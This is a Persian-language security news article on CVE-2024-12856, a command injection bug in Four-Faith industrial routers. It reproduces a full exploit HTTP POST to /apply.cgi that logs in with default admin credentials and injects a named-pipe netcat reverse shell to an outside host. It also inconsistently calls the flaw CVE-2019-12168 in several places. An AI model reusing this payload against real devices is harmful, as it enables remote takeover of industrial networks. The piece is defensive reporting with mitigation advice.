روتر صنعتی Four-Faith توسط آسیب پذیری CVE-2024-12856 مورد سوء استفاده قرار گرفت!

روترهای Four-Faith از جمله تجهیزات پیشرفته در حوزه ارتباطات صنعتی و اینترنت اشیا (IoT) به شمار می‌آیند که به‌طور گسترده در صنایع مختلف استفاده می‌شوند. این روترها با تمرکز بر اتصال پایدار و امن طراحی شده‌اند و برای کاربردهای مختلف مانند شبکه‌های صنعتی، حمل‌ونقل هوشمند، شهرهای هوشمند و مدیریت انرژی مناسب می‌باشند.

بر اساس یافته‌های جدید VulnCheck، بیش از 15000 روتر Four-Faith متصل به اینترنت دارای یک آسیب‌ پذیری امنیتی با شدت بالا (CVE-2024-12856) هستند. این نقص امنیتی، یک آسیب پذیری تزریق فرمان سیستم‌عامل (OS) است که بر مدل‌های F3x24 و F3x36 روتر Four-Faithتأثیر می‌گذارد و تحت سوء استفاده فعال قرار دارد.

اکسپلویت این آسیب پذیری منوط به آن است که مهاجم بتواند از راه دور و با موفقیت خود را احراز هویت کند. از این رو، چنانچه داده‌های احراز هویت روتر بصورت پیش‌فرض باقی مانده باشند، این خود می‌تواند راه را برای هکرها هموار سازد تا به موردم دسترسی پیدا کرده و دستورات سیستم‌عامل را از راه دور اجرا کنند.

در واقع، آسیب پذیری CVE-2019-12168 به مهاجمان احراز هویت شده اجازه می‌دهد تا هنگام تغییر زمان سیستم از طریق اِند پوینت /apply.cgi، دستورات سیستم عامل دلخواه را توسط پروتکل HTTP اجرا کنند.

در حمله ای که توسط VulnCheck شرح داده شده است، هکرها از داده‌های احراز هویت پیش فرض روتر برای راه اندازی اکسپلویت CVE-2024-12856 سوء استفاده نموده و یک Shell معکوس را به منظور دسترسی از راه دور به روتر اجرا کرده‌اند.

اکسپلویت CVE-2019-12168، شامل ارسال درخواست‌های HTTP ساخته شده خاص به اینترفیس مدیریت روتر Four-Faith است. به عنوان مثال، درخواست POST زیر نشان می‌دهد که چگونه یک مهاجم می‌تواند از این آسیب پذیری برای اجرای Shell معکوس سوء استفاده کند:

				
					POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time

این درخواست، پارامتر adj_time_year را تغییر میدهد و به دنبال آن تزریق دستور (command injection) را فعال می‌سازد.

داده‌های Censys حاکی از آن است که بیش از 15000 دستگاه روتر Four-Faith متصل به اینترنت آسیب پذیر وجود دارد. به گفته شرکت اطلاعات تهدید GreyNoise، تلاش‌ها برای سوء استفاده از CVE-2019-12168 در نوزدهم دسامبر 2024 مشاهده و ثبت شده است.

در حال حاضر، هیچ اطلاعاتی در مورد پچ‌های این آسیب پذیری در دسترس نیست. VulnCheck این مسئله را در بیستم دسامبر به Four-Faith گزارش کرده اما هنوز هیچگونه به‌روزرسانی از سوی این شرکت منتشر نشده است. از این رو، به کاربران مدل‌های آسیب پذیر روتر Four-Faith اکیداً توصیه می‌شود که:

پسورد پیش فرض رورتر را هر چه سریع‌تر به یک پسورد امن تغییر دهند.
ترافیک شبکه را به منظور یافتن هرگونه تلاش برای دسترسی غیرمجاز مانیتور کنند.
به محض انتشار پچ‌های Four-Faith آنها را دریافت و نصب نمایند.